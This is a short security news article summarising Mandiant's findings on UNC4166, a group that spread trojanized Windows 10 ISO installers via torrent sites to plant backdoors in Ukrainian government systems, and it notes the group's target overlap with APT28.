Researchers observed a new threat activity, tracked as UNC4166, launching socially engineered supply chain attacks against the Ukrainian government. It has been using trojanized ISO files posing it as legitimate Windows 10 installers, to deliver malware payloads and additional malicious tools.
According to Mandiant researchers, UNC4166 distributed malicious installers via Ukrainian and Russian platforms for torrent file-sharing.
One of the ISOs pushed in this attack was configured to disable the typical Windows security telemetry and other Windows tasks and services, and block automatic updates and license verification.
Scheduled tasks were spotted on several infected devices beaconing to .onion TOR domains in mid-July. These tasks were altered and designed to receive commands that would get executed via PowerShell.
The group uses tasks to conduct reconnaissance on the victim device and based on the details, victims are selected for further tasking.
After the initial reconnaissance, UNC4166 deployed additional backdoors such as Stowaway and Beacon (AzureSettingSync.dll) to enable additional tradecraft.
Additionally, it delivered secondary toehold backdoors, including SPAREPART, likely as a means of redundancy for the initial PowerShell bootstraps.
The group used these backdoors to maintain access to the compromised computers, execute commands, transfer files, and steal information, including credentials and keystrokes.
Target overlap with APT28
The organizations targeted by UNC4166 were previously targeted by the Russian-linked APT28 group in disruptive wiper attacks.
Both groups shared the same targets, precisely with Russia's GRU interest. It indicates UNC4166 can follow the footsteps of other Russian-linked groups that emerged at the onset of the war.
The use of sophisticated tactics such as trojanized ISO files indicates that the attackers behind this campaign are well-versed in cyber intrusion skills, and are selectively picking their targets. Such threats are very difficult to detect, and the best way to protect against them is to have a continuous review and audit of the security posture across the networks.